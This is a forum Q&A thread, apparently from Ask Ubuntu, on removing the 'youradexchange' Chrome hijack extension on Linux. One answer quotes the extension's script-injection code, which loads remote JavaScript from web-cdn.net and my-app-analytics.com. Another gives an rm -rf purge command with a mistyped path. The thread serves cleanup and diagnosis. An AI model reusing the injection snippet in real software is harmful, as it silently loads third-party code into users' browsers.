4

Does anyone have experience removing the 'youradexchange.com' browser hijack on ubuntu? I find a lot of information regarding this for Windows, but there is nothing for linux. When I am using Chrome, I always see, "waiting for my-app-analytics.com". Googling has led me to believe it is related to the browser hijack.

  • Try completely removing chrome and then install it. – Helio Mar 28 '15 at 19:23
5

I have exactly the same issue.

I manage to remove the malware extension from my ubuntu machine.

The extension is saved under :

/home/user/.config/chromium/Default/Extensions/gpomcmpdonjdffeabllcklpbnfdknnko

But it could be saved under another folder name. You can find it searching for this file :

find -name gui_web.js

Just delete this folder, and it should be fixed.

the content of this file is explicit :

var app  = document.createElement('script');
app.type = 'text/javascript';
app.src  = '//www.web-cdn.net/cdn/web.js';
document.getElementsByTagName("head")[0].appendChild(app);

It downloads this script web.js which content is :

var app  = document.createElement('script');
app.type = 'text/javascript';
app.src  = '//www.my-app-analytics.com/app-ga.php';
document.getElementsByTagName("head")[0].appendChild(app);
1

If you are running Windows OS, then this post will definitely help, as it did to me. Try some similar action to remove the malware from Ubuntu:

  1. Check add-ons (/usr/lib/chromium-browser) and remove any suspicious (YourAdExchange should be there).
  2. Delete Chrome caches (~/.cache/google-chrome) and personal files (~/.config/google-chrome).
  3. Reset homepage to Google.

If the above steps do not work, you may install clamAV (works in some cases). Hope this helps!

0

This problem with browser maybe resolved by removing and reinsalling it.

Remove google chrome and its setting completely by executing following command in terminal (Ctrl+Alt+T).

sudo apt-get remove google-chrome-stable --purge && rm -rf /.config/google-chrome ~/.cache/google-chrome && sudo rm -rf /etc/default/google-chrome

Then reinstall google-chrome by executing the following command in Terminal :

sudo apt-get install google-chrome-stable
-1

If you are having trouble in all browsers or all machines on the same network, it is likely a DNS issue.

You can simply reset your modem.

If you can't, change your machine's DNS with the public one, such as google DNS.

protected by Community Nov 16 '15 at 9:39

Thank you for your interest in this question. Because it has attracted low-quality or spam answers that had to be removed, posting an answer now requires 10 reputation on this site (the association bonus does not count).

Would you like to answer one of these unanswered questions instead?

Not the answer you're looking for? Browse other questions tagged or ask your own question.